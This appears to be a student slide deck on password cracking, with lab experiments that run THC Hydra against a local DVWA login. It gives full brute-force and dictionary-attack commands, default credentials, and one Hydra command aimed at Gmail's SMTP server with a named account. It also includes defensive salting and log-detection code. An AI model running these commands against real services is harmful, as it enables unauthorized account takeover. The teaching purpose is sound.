cyber security project - unice.frdeptinfo.unice.fr/~bmartin/passwords.pdf · dvwa (damn vulnerable...

Post on 10-Aug-2020


CYBER SECURITY PROJECT: PASSWORD CRACKING

BALLERIO SIMONE

GALASSO EMANUELE

Summary

THC Hydra

Password Cracking

Experiments

Password Cracking features

• Online Attack

• Offline Attack

• Dictionary Attack

• Brute Force

• Rainbow table

• Hybrid techniques

What is password cracking?

Password cracking is the process of attempting to gain unauthorized access to restricted systems using common passwords or algorithms that guess passwords.

How is a password stored?

Password → HASH FUNCTION → Hashed Password

Online VS Offline Cracking

Online: try a large number of username/password combinations against the login portal. Limited by the speed of the network.

Offline: try to get the hash of the password in an offline situation and then crack it, trying to find the clear-text value that computes to that hash. Limited by the speed of the hacker's machine.

Brute Force Attack

Depends only on the length of the password and on the system used.

Try all the possible combinations of characters.

We are 100% sure to find the password, but we don't know how long the process will take.

Example Brute Force

PROBLEM

Let's assume for a moment that we are in an environment where all systems have equal computing power, and that we have to find a password composed only of 8 alphanumeric characters. How many attempts do we have to make in the worst case?

Consideration

• Alphanumeric characters are: a...z, A...Z, 0...9 = 64 possibilities.

• We already know the username.

• The solution depends only on the length of the password.

• Knowing the exact length of the password always simplifies the job.

SOLUTION

$64^8$ possible combinations (disposition with repetition: $D^{r}_{n,k} = n^{k}$)

Dictionary Attack

Depends on the complexity of the password and on whether it has an ordinary meaning.

Try all the strings in a pre-arranged listing.

There is less chance of arriving at a solution, but when one is found, it is found relatively quickly.

Example Dictionary Attack

PROBLEM

Let's consider a Dictionary Attack with the French dictionary, where there are roughly 135,000 words.

Solution

We can find a common French password in just 135,000 tries.

Rainbow table Attack

It is a pre-computed dictionary of plain text passwords and their corresponding hash values.

More than one text can produce the same hash, so it is not important to know what the original password really was.

Salting passwords is a common method of preventing rainbow table attacks.

Salting Passwords

BOB, ALICE: SAME PASSWORD = SAME HASH STORED
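The Bob and Alice case, as an added example that is not part of the original slides: without a salt the two stored hashes are identical and both fall to one precomputed table, while a per-user random salt makes the stored values differ and the table useless. PBKDF2-HMAC-SHA256 with 200,000 iterations, the password value and the tiny lookup table (a stand-in for a real rainbow table) are assumptions made for this illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor for this example


def unsalted_hash(password: str) -> str:
    """Weak scheme from the slide: one hash, no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_record(password: str) -> dict:
    """Store a fresh random salt next to a slow, salted digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "digest": digest}


def verify(password: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), record["salt"], ITERATIONS
    )
    return hmac.compare_digest(digest, record["digest"])


def precomputed_hits(stored: dict, table: dict) -> dict:
    """Return users whose stored value appears in a precomputed hash table."""
    return {user: table[h] for user, h in stored.items() if h in table}


# Constructed sample data: Bob and Alice chose the same password.
USERS = {"bob": "sunshine1", "alice": "sunshine1"}
# Plain lookup table standing in for a rainbow table (built once, reused).
TABLE = {unsalted_hash(p): p for p in ("123456", "password", "sunshine1")}

if __name__ == "__main__":
    weak = {u: unsalted_hash(p) for u, p in USERS.items()}
    strong = {u: salted_record(p) for u, p in USERS.items()}
    salted_hex = {u: r["digest"].hex() for u, r in strong.items()}
    print("unsalted equal:", weak["bob"] == weak["alice"])
    print("table hits, unsalted store:", precomputed_hits(weak, TABLE))
    print("salted equal:", salted_hex["bob"] == salted_hex["alice"])
    print("table hits, salted store:", precomputed_hits(salted_hex, TABLE))
    print("login still works:", verify("sunshine1", strong["bob"]))
```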

Hybrid Attack


Hybrid Dictionary

Background knowledge Dictionary

Maximize your chances of success


Experiments

Tools

• Kali Linux is an advanced penetration testing distribution

• Hydra is a parallelized login cracker

• Damn Vulnerable Web App

Kali Linux

Kali contains several hundred tools which are geared towards various information security tasks, such as:

• Penetration Testing

• Security research

• Computer Forensics

• Reverse Engineering

Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Hydra

• Is very fast and flexible

• New modules are easy to add

• Shows how easy it would be to gain unauthorized access to a system remotely

DVWA (Damn Vulnerable Web App)

Ethical hackers test their skills and run tools in a legal environment.

• For beginners and advanced users who want to prove their skills, DVWA is the best platform.

• This is the best place to do hacking.

• Helps web developers better understand the processes of securing web applications

Idea of Experiments

In these experiments, we propose a password-cracking exercise aimed at discovering the [user-password] pair of the access credentials located within the DVWA software.

Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk"

In this case it is not possible to show the solution, because the number of password combinations is very high and the attack would therefore take a long time.

Dictionary Attack

hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

• Low: This security level is completely vulnerable and has no security measures at all.

• Medium: This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application.
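Seen from the defender's side, every guess sent to the DVWA login form with a GET request leaves one line in the web server's access log. The following added example (not part of the original slides) flags source addresses that exceed a login-attempt threshold within a sliding window; the Apache combined log format, the threshold of 5 attempts per 60 seconds, the IP addresses and the log lines are all assumptions constructed for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/DVWA/vulnerabilities/brute/"
# Apache combined log format (assumed): ip, identity, user, [time], "request", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" (\d{3}) ')


def parse(line):
    """Return (ip, time, username) for a login attempt, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, stamp, target, _status = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    if url.path != LOGIN_PATH or "username" not in query:
        return None
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, query["username"][0]


def detect(lines, max_attempts=5, window=timedelta(seconds=60)):
    """Flag source IPs with more than max_attempts logins inside the window."""
    recent = defaultdict(deque)   # ip -> attempts still inside the window
    alerts = {}
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        ip, when, user = event
        attempts = recent[ip]
        attempts.append((when, user))
        while when - attempts[0][0] > window:
            attempts.popleft()    # drop attempts older than the window
        if len(attempts) > max_attempts and ip not in alerts:
            users = sorted({u for _, u in attempts})
            alerts[ip] = {"first_alert": when, "usernames": users}
    return alerts


# Constructed sample: one client guessing every second, one user with a typo.
SAMPLE = [
    f'192.0.2.66 - - [10/Aug/2020:10:00:{s:02d} +0000] "GET {LOGIN_PATH}'
    f'?username=admin&password=guess{s}&Login=Login HTTP/1.1" 200 4521 "-" "-"'
    for s in range(8)
] + [
    f'198.51.100.7 - - [10/Aug/2020:10:00:03 +0000] "GET {LOGIN_PATH}'
    '?username=alice&password=typo&Login=Login HTTP/1.1" 200 4521 "-" "-"',
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

Because a GET form carries the submitted password in the query string, these access logs also contain users' real passwords and should be protected accordingly.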


SMTP Attack

hydra smtp.gmail.com -l test2.20192020@gmail.com -P temp -s 465 -S -V -f smtp

Other Possible Experiments

THC-Hydra supports many different services:

• Afp
• Cisco
• Cvs
• Firebird
• Ftp
• Http-get
• Http-head
• Http-proxy
• Https-get
• Https-head
• Https-form-get
• Https-form-post
• Imap
• Smb
• Ldap2
• Ldap3
• Mssql
• Mysql
• Ncp
• Nntp
• Oracle-listener
• Pcanywhere
• Pop3
• Postgres
• Rexec
• Snmp
• Smtp
• Telnet

CONCLUSION

• Use passwords that are at least 15 characters long.

• Don't use the same password for privileged user accounts between systems.

• Don't share it.

Thanks for the attention

How to test

VirtualBox: https://www.virtualbox.org/wiki/Downloads

Kali Linux: https://linoxide.com/distros/learn-method-install-kali-linux-virtualbox/

DVWA installation: https://medium.com/datadriveninvestor/setup-install-dvwa-into-your-linux-distribution-d76dc3b80357

If you have any type of problem during the installation, contact us and we will give you a .vdi file of the virtual machine with all the installations that you need.

Username: root

Password: toor

1. service apache2 start

2. service mysql start

http://127.0.0.1/DVWA/login.php

Username: admin

Password: password

NOW YOU ARE IN THIS PAGE:

(Select)

Right-click:

Test it and have fun:

Pure Brute Force:

hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Dictionary Attack:

hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Try: hydra -h for more information

ENJOY!
